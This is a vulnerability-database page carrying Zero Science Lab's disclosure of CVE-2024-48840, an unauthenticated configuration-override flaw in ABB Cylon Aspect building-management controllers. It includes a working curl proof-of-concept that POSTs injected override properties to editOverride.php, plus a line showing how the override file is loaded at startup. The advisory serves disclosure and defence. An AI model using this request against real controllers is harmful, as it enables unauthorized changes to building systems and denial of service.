Vulners
Lucene search
ABB Cylon Aspect 3.08.02 (editOverride.php) Authentication Bypass MIX Override
๐๏ธย 16 Dec 2024ย 00:00:00Reported byย Gjoko KrsticTypeย 
ย zeroscience๐ย www.zeroscience.mk๐ย 342ย Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | The vulnerability of microprogramming software in embedded network control controllers of ASPECT Enterprise, NEXUS Series, and MATRIX Series lies in improper code generation, allowing attackers to execute arbitrary codes. | 9 Dec 202400:00 | โ | bdu_fstec |
 | CVE-2024-48840 | 5 Dec 202412:52 | โ | circl |
 | ABB ASPECT ๅฎๅ จๆผๆด | 5 Dec 202400:00 | โ | cnnvd |
 | CVE-2024-48840 | 5 Dec 202412:38 | โ | cve |
 | CVE-2024-48840 Unauthorized Access | 5 Dec 202412:38 | โ | cvelist |
 | ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution | 17 Apr 202500:00 | โ | exploitdb |
 | EUVD-2024-43215 | 3 Oct 202520:07 | โ | euvd |
 | Vulnerabilities fixed in ABB ASPECT, NEXUS Series and MATRIX Series | 6 Dec 202411:49 | โ | ncsc |
 | CVE-2024-48840 | 5 Dec 202413:15 | โ | nvd |
 | CVE-2024-48840 | 5 Dec 202413:15 | โ | osv |
10
<html><body><p>ABB Cylon Aspect 3.08.02 (editOverride.php) Authentication Bypass MIX Override
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller allows users to bypass authentication
by setting the 'content' POST parameter. This enables an attacker to inject arbitrary
configuration overrides, potentially leading to unauthorized changes and compromising
system integrity. The vulnerability can be exploited to update the /usr/local/aam/etc/override.properties
file. This file contains critical configuration overrides such as enabling overrides
(Override.enabled=true) and setting specific properties like debug.level=1. The
runjava.VARIANT* script then sources this file during execution, applying the overrides
when the system reboots or the application restarts. This allows attackers to
manipulate critical system settings, potentially causing performance degradation,
introducing security risks, or resulting in a denial of service scenario.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5884
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5884.php
CVE ID: CVE-2024-48840
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48840
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
$ curl -X POST http://192.168.73.31/editOverride.php \
> -d "content=Override.enabled%3Dtrue%0D%0A$(cat mix.properties.ENTERPRISE)" \
> --trace-ascii logche.txt
Changes Saved
$ awk 'NR==79' ./MIX_CMIX/runjava.ENTERPRISE
CMD="java -Xms${HEAPMIN} -Xmx${HEAPMAX} -server -classpath ${CLASSPATH} -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -Dlog4j.configuration="log4j.mix.properties" -Doverride.mix.properties=/usr/local/aam/etc/override.properties ${JVMPARAMS} ${PLUGGABLE} com.aamatrix.mix.server.HeadlessController"
</p></body></html>Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Dec 2024 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8 - 10
CVSS 49.3
EPSS0.02073
SSVC